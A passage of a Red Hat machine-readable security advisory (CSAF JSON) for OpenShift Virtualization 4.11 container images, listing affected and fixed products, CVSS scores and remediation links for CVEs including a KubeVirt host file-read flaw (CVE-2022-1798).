"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N", "version": "3.1" }, "products": [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "golang: syscall: don\u0027t close fd 0 on ForkExec error" }, { "acknowledgments": [ { "names": [ "Oliver Brooks and James Klopchic" ], "organization": "NCC Group" } ], "cve": "CVE-2022-1798", "cwe": { "id": "CWE-22", "name": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)" }, "discovery_date": "2022-08-12T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2117872" } ], "notes": [ { "category": "description", "text": "An arbitrary file read vulnerability was found in the kubeVirt API. This flaw makes it possible to use the kubeVirt API to provide access to host files (like /etc/passwd, for example) in a KubeVirt VM as a disk device that can be written to and read from.", "title": "Vulnerability description" }, { "category": "summary", "text": "kubeVirt: Arbitrary file read on the host from KubeVirt VMs", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64" ], "known_not_affected": [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2022-1798" }, { "category": "external", "summary": "RHBZ#2117872", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2117872" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2022-1798", "url": "https://www.cve.org/CVERecord?id=CVE-2022-1798" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2022-1798", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-1798" }, { "category": "external", "summary": "https://github.com/google/security-research/security/advisories/GHSA-cvx8-ppmc-78hm", "url": "https://github.com/google/security-research/security/advisories/GHSA-cvx8-ppmc-78hm" } ], "release_date": "2022-08-08T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2022-09-14T19:28:51+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2022:6526" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.7, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N", "version": "3.1" }, "products": [ "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64" ] } ], "threats": [ { "category": "impact", "details": "Important" } ], "title": "kubeVirt: Arbitrary file read on the host from KubeVirt VMs" }, { "cve": "CVE-2022-21698", "cwe": { "id": "CWE-772", "name": "Missing Release of Resource after Effective Lifetime" }, "discovery_date": "2022-01-19T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", 